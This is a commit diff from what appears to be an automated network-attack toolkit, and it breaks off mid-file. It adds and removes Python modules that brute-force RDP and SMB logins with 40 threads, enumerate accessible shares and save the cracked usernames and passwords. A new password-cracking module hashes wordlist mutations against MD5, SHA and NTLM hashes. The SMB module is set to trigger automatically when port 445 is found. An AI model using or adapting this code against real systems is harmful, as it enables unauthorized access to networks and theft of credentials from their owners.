host = row.get("hostname") or (row.get("hostnames") or "").split(";")[0] if row.get("hostnames") else None
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"
msg += f"- MAC: {mac}\n"
if ip_s:
msg += f"- Last IP: {ip_s}\n"
msg += f"- Time: {timestamp}"
self._send(msg)
return "success"
except Exception as e:
logger.error(f"PresenceLeave error: {e}")
return "failed"
if __name__ == "__main__":
sd = SharedData()
logger.info("PresenceLeave ready (direct mode).")

View File

@@ -1,198 +0,0 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

265
actions/rune_cracker.py Normal file
View File

@@ -0,0 +1,265 @@
# Advanced password cracker supporting multiple hash formats and attack methods.
# Saves settings in `/home/bjorn/.settings_bjorn/rune_cracker_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input Input file containing hashes to crack.
# -w, --wordlist Path to password wordlist (default: built-in list).
# -r, --rules Path to rules file for mutations (default: built-in rules).
# -t, --type Hash type (md5, sha1, sha256, sha512, ntlm).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/hashes).
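# Example invocation (illustrative; file paths are placeholders):
#   python rune_cracker.py -i hashes.txt -t md5 -w wordlist.txt -o /home/bjorn/Bjorn/data/output/hashes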
import os
import json
import hashlib
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
import itertools
import re
b_class = "RuneCracker"
b_module = "rune_cracker"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/hashes"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "rune_cracker_settings.json")
# Supported hash types and their patterns
HASH_PATTERNS = {
'md5': r'^[a-fA-F0-9]{32}$',
'sha1': r'^[a-fA-F0-9]{40}$',
'sha256': r'^[a-fA-F0-9]{64}$',
'sha512': r'^[a-fA-F0-9]{128}$',
'ntlm': r'^[a-fA-F0-9]{32}$'
}
class RuneCracker:
def __init__(self, input_file, wordlist=None, rules=None, hash_type=None, output_dir=DEFAULT_OUTPUT_DIR):
self.input_file = input_file
self.wordlist = wordlist
self.rules = rules
self.hash_type = hash_type
self.output_dir = output_dir
self.hashes = set()
self.cracked = {}
self.lock = threading.Lock()
# Load mutation rules
self.mutation_rules = self.load_rules()
def load_hashes(self):
"""Load hashes from input file and validate format."""
try:
with open(self.input_file, 'r') as f:
for line in f:
hash_value = line.strip()
if self.hash_type:
if re.match(HASH_PATTERNS[self.hash_type], hash_value):
self.hashes.add(hash_value)
else:
# Try to auto-detect hash type
for h_type, pattern in HASH_PATTERNS.items():
if re.match(pattern, hash_value):
self.hashes.add(hash_value)
break
logging.info(f"Loaded {len(self.hashes)} valid hashes")
except Exception as e:
logging.error(f"Error loading hashes: {e}")
def load_wordlist(self):
"""Load password wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r', errors='ignore') as f:
return [line.strip() for line in f if line.strip()]
return ['password', 'admin', '123456', 'qwerty', 'letmein']
def load_rules(self):
"""Load mutation rules."""
if self.rules and os.path.exists(self.rules):
with open(self.rules, 'r') as f:
return [line.strip() for line in f if line.strip() and not line.startswith('#')]
return [
'capitalize',
'lowercase',
'uppercase',
'l33t',
'append_numbers',
'prepend_numbers',
'toggle_case'
]
def apply_mutations(self, word):
"""Apply various mutation rules to a word."""
mutations = set([word])
for rule in self.mutation_rules:
if rule == 'capitalize':
mutations.add(word.capitalize())
elif rule == 'lowercase':
mutations.add(word.lower())
elif rule == 'uppercase':
mutations.add(word.upper())
elif rule == 'l33t':
mutations.add(word.replace('a', '@').replace('e', '3').replace('i', '1')
.replace('o', '0').replace('s', '5'))
elif rule == 'append_numbers':
mutations.update(word + str(n) for n in range(100))
elif rule == 'prepend_numbers':
mutations.update(str(n) + word for n in range(100))
elif rule == 'toggle_case':
mutations.add(''.join(c.upper() if i % 2 else c.lower()
for i, c in enumerate(word)))
return mutations
def hash_password(self, password, hash_type):
"""Generate hash for a password using specified algorithm."""
if hash_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif hash_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif hash_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif hash_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif hash_type == 'ntlm':
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
return None
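# Illustrative example (sketch): hash_password("password", "md5") returns
# "5f4dcc3b5aa765d61d8327deb882cf99"; a crack succeeds when such a digest is
# present in self.hashes.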
def crack_password(self, password):
"""Attempt to crack hashes using a single password and its mutations."""
try:
mutations = self.apply_mutations(password)
for mutation in mutations:
for hash_type in HASH_PATTERNS.keys():
if not self.hash_type or self.hash_type == hash_type:
hash_value = self.hash_password(mutation, hash_type)
if hash_value in self.hashes:
with self.lock:
self.cracked[hash_value] = {
'password': mutation,
'hash_type': hash_type,
'timestamp': datetime.now().isoformat()
}
logging.info(f"Cracked hash: {hash_value[:8]}... = {mutation}")
except Exception as e:
logging.error(f"Error cracking with password {password}: {e}")
def save_results(self):
"""Save cracked passwords to JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'total_hashes': len(self.hashes),
'cracked_count': len(self.cracked),
'cracked_hashes': self.cracked
}
output_file = os.path.join(self.output_dir, f"cracked_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
def execute(self):
"""Execute the password cracking process."""
try:
logging.info("Starting password cracking process")
self.load_hashes()
if not self.hashes:
logging.error("No valid hashes loaded")
return
wordlist = self.load_wordlist()
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.crack_password, wordlist)
self.save_results()
logging.info(f"Cracking completed. Cracked {len(self.cracked)}/{len(self.hashes)} hashes")
except Exception as e:
logging.error(f"Error during execution: {e}")
def save_settings(input_file, wordlist, rules, hash_type, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_file": input_file,
"wordlist": wordlist,
"rules": rules,
"hash_type": hash_type,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="Advanced password cracker")
parser.add_argument("-i", "--input", help="Input file containing hashes")
parser.add_argument("-w", "--wordlist", help="Path to password wordlist")
parser.add_argument("-r", "--rules", help="Path to rules file")
parser.add_argument("-t", "--type", choices=list(HASH_PATTERNS.keys()), help="Hash type")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
input_file = args.input or settings.get("input_file")
wordlist = args.wordlist or settings.get("wordlist")
rules = args.rules or settings.get("rules")
hash_type = args.type or settings.get("hash_type")
output_dir = args.output or settings.get("output_dir")
if not input_file:
logging.error("Input file is required. Use -i or save it in settings")
return
save_settings(input_file, wordlist, rules, hash_type, output_dir)
cracker = RuneCracker(
input_file=input_file,
wordlist=wordlist,
rules=rules,
hash_type=hash_type,
output_dir=output_dir
)
cracker.execute()
if __name__ == "__main__":
main()

File diff suppressed because it is too large

331
actions/smb_bruteforce.py Normal file
View File

@@ -0,0 +1,331 @@
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets supplied by the orchestrator (ip, port)
- IP -> (MAC, hostname) from DB.hosts
- Successes recorded in DB.creds (service='smb'), one row PER SHARE (database=<share>)
- Keeps the queue/thread logic and signatures. No more rich/progress.
"""
import os
import threading
import logging
import time
from subprocess import Popen, PIPE
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
b_class = "SMBBruteforce"
b_module = "smb_bruteforce"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
b_service = '["smb"]'
b_trigger = 'on_any:["on_service:smb","on_new_port:445"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""Wrapper orchestrateur -> SMBConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_bruteforce = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""Lance le bruteforce SMB pour (ip, port)."""
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point dentrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
# ---------- file utilities ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- DB hosts mapping ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
pass
return accessible
except Exception:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
else:
logger.info(f"Trying smbclient -L for {adresse_ip} with user '{user}'")
return []
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
shares = []
for line in smbclient_output.splitlines():
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts:
name = parts[0]
if name not in IGNORED_SHARES:
shares.append(name)
return shares
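# Illustrative example (sketch; abridged from typical `smbclient -L` output):
#
#   Sharename       Type      Comment
#   ---------       ----      -------
#   public          Disk      Shared folder
#   IPC$            IPC       IPC Service
#
# parse_shares() on the lines above returns ['public']: the header and separator
# lines are skipped and 'IPC$' is filtered out by IGNORED_SHARES.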
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('smb',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='smb'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE(COALESCE("database",""),'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread for SMB bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
try:
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
def run_bruteforce(self, adresse_ip: str, port: int):
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
# Fallback to smbclient -L if nothing was found
if not success_flag[0]:
logger.info(f"No success via SMBConnection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share in IGNORED_SHARES:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials IP:{adresse_ip} | User:{user} | Share:{share} via smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if getattr(self.shared_data, "timewait_smb", 0) > 0:
time.sleep(self.shared_data.timewait_smb)
return success_flag[0], self.results
# ---------- DB persistence ----------
def save_results(self):
# insert self.results into creds (service='smb'), database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="smb",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=share, # uses the 'database' column to distinguish shares
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=share
)
else:
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
self.results = []
def removeduplicates(self):
# no longer needed with the unique index; kept for compatibility.
pass
if __name__ == "__main__":
# Standalone mode is not used in production; kept minimal
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
logger.info("SMB brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)

View File

@@ -1,261 +0,0 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

284
actions/sql_bruteforce.py Normal file
View File

@@ -0,0 +1,284 @@
"""
